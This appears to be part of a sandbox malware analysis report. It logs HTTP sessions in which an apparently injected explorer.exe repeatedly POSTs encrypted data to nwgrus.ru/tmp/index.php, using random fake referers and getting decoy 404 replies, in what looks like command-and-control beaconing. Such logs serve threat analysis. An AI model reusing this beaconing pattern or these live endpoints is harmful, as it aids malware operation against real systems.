                                      Oct 13, 2024 18:28:00.531119108 CEST143OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 5a 33 c8 99
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuZ3t-pLq"A-=@T\</8|
                                      Oct 13, 2024 18:28:01.491563082 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:01 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.465016148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:01.509685040 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://bysfflokkqfepm.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 225
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:01.509685040 CEST225OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 4a 26 bb e8
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuJ&W)`_3_FY|$[MTfvN5'$!'8}BNM0nfKND2Zx3I:;>r/U1
                                      Oct 13, 2024 18:28:02.469595909 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:02 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.465022148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:02.677640915 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://jktwhgejoiledxll.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 150
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:02.677666903 CEST150OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2c 5f b3 f4
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu,_]|{M2WK*b"(JXIC0.[nPJu<v
                                      Oct 13, 2024 18:28:03.625276089 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:03 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.465028148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:03.634772062 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://dixscrvatda.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 131
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:03.634807110 CEST131OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 37 32 cf f7
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu72VvDcYs~tCR<f_C)pkj
                                      Oct 13, 2024 18:28:04.591512918 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:04 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.465034148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:04.602816105 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://mjtbwlnoxuan.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 293
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:04.602850914 CEST293OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 75 5c ac 97
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuu\(SK2w&t8i%uh[WL0m7/i,IU!mPe6OQ:cx2f,zFbFrfpGrZ9
                                      Oct 13, 2024 18:28:05.563189983 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:05 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.465046148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:05.572858095 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://sndnvyniffwfhh.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 279
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:05.572884083 CEST279OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 62 08 b1 90
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vub2tbbtQOs-fAwCI '{H;n@igo#b@ H)FOX!@"]z"Utf/5Cs*]&l
                                      Oct 13, 2024 18:28:06.520082951 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:06 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.465052148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:06.529167891 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://vedtfnbjotxnqis.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 259
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:06.529226065 CEST259OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 57 2a d4 e7
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuW*0m]RtSMnnnysv-HEK\AU1&a@I1Bz]]u5YHrYQ>"NJt^L
                                      Oct 13, 2024 18:28:07.527420044 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:07 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.465058148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:07.604176044 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ijwwxiabyxki.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 154
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:07.604176044 CEST154OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 3d 1e a7 e4
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu=w8NcHZ*VPug)~@o"Cjmz<K
                                      Oct 13, 2024 18:28:08.549442053 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:08 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.465064148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:08.561347961 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://wqfylsyerupgn.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 115
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:08.561381102 CEST115OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5b 3e d3 a1
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu[>c}hs`jR;f)/
                                      Oct 13, 2024 18:28:09.502774000 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:09 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.465070148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:09.548398018 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://oqlpckrtfgisr.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 220
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:09.548398018 CEST220OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3d 52 a2 be
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu=Rz6xYivOP3dY_c\B;GO~[J!Mm\'-{i!5;wvHS61J{.
                                      Oct 13, 2024 18:28:10.463885069 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:10 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.465080148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:28:10.477514029 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://vybahkmcxnemgwbs.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 241
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:28:10.477514029 CEST241OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 20 55 c7 f9
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu U_vd{L\#6mYaC:"*KGR@a(0o+-/_[.rWC.-XDl'ZiBv{`Xz
                                      Oct 13, 2024 18:28:11.447698116 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:11 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
